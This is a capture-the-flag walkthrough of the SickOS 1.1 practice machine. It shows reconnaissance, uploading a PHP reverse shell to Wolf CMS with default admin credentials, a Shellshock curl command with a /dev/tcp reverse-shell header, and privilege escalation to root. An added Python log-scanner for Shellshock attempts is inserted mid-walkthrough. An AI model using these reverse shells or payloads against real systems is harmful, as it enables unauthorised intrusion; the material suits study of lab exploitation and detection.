Saturday, June 9, 2018

SickOS 1.1


- Layout for this exercise:


- The goal of this exercise is the study of the hacking process for the vulnerable machine SickOS 1.1

- SickOS 1.1 can be downloaded from here:,132/

- Once downloaded and extracted with VMware:


- Using netdiscover we notice that the only IP address on the local network belonging to VMware is, so it should correspond to the vulnerable machine SickOS 1.1:

- Scanning with Nmap shows two open ports: 22 (SSH) and 3128 (Squid HTTP proxy):

- Configuring the Firefox Connection Settings for the discovered HTTP proxy (

- Connecting with the browser:

- Viewing the source there is nothing interesting:

- Let's explore the website structure with dirb:

- Looking at the robots.txt file:

- Exploring the folder /wolfcms:

- Using dirb against wolfcms:

- Looking inside the public folder:

- Using nikto to discover potential vulnerabilities:

- The most remarkable result is that /cgi-bin/status is vulnerable to Shellshock:


- Let's try two ways to exploit the vulnerable machine.

3.1 - Uploading a webshell

- Googling for Wolf CMS vulnerabilities:

- Going back to /wolfcms we learn that there is an Administrator:

- Reading from the previous description of the vulnerability:

- Let's explore the admin option:

- Trying admin:admin the authentication works:

- Going to the Files tab there is an Upload File function:

- At this point, why not upload a webshell?

- Kali Linux ships with some webshells:

- For instance, let's explore php-reverse-shell.php:

- Opening the file we see that there are two parameters that must be changed or adapted to our needs (the IP address and port to connect back to):

- Copying the webshell to a working folder so that we can manipulate it without losing the original version:

- Opening the webshell and modifying IP and port:

- Now it is ready to be uploaded to the vulnerable machine:

- We find php-reverse-shell.php at the /public folder:

- Before running it, let's establish a netcat listening session on port 3333:

- Running the webshell:

- The attack is successful, and a limited shell is achieved at the attacker's side:

3.2 - Shellshock

- Now, let's try to exploit the site by taking advantage of the Shellshock vulnerability.

- We can confirm that the CGI script uses bash as its interpreter, because requesting the path returns the output of uptime/uname inside a JSON string:

- Setting up a netcat listening session on port 4444:

- Let's craft a curl command to obtain a reverse shell:

- The parameters used in this case:
  • -x (proxy) =
  • -H (header) = User-Agent ignored; /bin/bash -i>& /dev/tcp/ 0>&1
  • target =
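From the defender's side, an attempt like the one above leaves a recognisable trace: the CGI server copies request headers into environment variables, so the Shellshock trigger "() {" shows up in the User-Agent (or Referer, or query string) field of the access log. The following script is an added example, not part of the original write-up; it parses Apache combined-format log lines (an assumption about the target's log format) and flags entries carrying that signature, using constructed sample lines against the page's /cgi-bin/status path.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format (assumption: the CGI host logs in this format).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Shellshock relies on a bash function definition "() {" placed at the start
# of an environment variable; CGI fills such variables from request headers.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Constructed sample lines (not real traffic): a benign request to the CGI
# script, a Shellshock probe with a harmless echo, and a benign User-Agent
# that merely contains braces (must not be flagged).
SAMPLE_LOG = """\
10.0.0.5 - - [09/Jun/2018:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 145 "-" "Mozilla/5.0"
10.0.0.9 - - [09/Jun/2018:10:00:07 +0000] "GET /cgi-bin/status HTTP/1.1" 200 145 "-" "() { :; }; echo probe"
10.0.0.5 - - [09/Jun/2018:10:00:09 +0000] "GET /wolfcms/ HTTP/1.1" 200 2210 "-" "Mozilla/5.0 {test}"
"""


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_shellshock_attempt(entry):
    """True when a header-derived field (or the decoded URL) carries '() {'."""
    fields = (entry["ua"], entry["referer"], unquote(entry["path"]))
    return any(SHELLSHOCK_RE.search(value) for value in fields)


def find_shellshock_attempts(log_text):
    """Return (source ip, requested path, user agent) for each suspicious line."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_shellshock_attempt(entry):
            hits.append((entry["ip"], entry["path"], entry["ua"]))
    return hits


if __name__ == "__main__":
    for ip, path, ua in find_shellshock_attempts(SAMPLE_LOG):
        print(f"Shellshock attempt from {ip} to {path}: {ua!r}")
```

Because the request in this write-up goes through Squid, the same signature can also be searched for in the proxy's own access log, and the source IP recorded by Apache will be the proxy's rather than the client's.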

- A limited shell is achieved at the attacker's side:


- Listing the folder /var/www:

- Listing wolfcms:

- Opening config.php we find interesting credentials for the user root:

- Trying to use the root credentials to get a shell, we find that the current shell does not allow using the sudo command:

- Spawning a TTY so that we can run a /bin/bash shell:

- Trying again, su works but the authentication fails:

- Remembering the current user:

- Let's move to another user, for instance sickos:

- Now the authentication is correct:

- Finally a root shell is achieved:

- Also, we could reach the same point by SSH-ing in with the sickos user account:

- Surprisingly, sickos has full sudo privileges:

- Also:


- Reading the flag:

- By the way, the flag's name is an MD5 hash:

- Cracking it yields bleh!!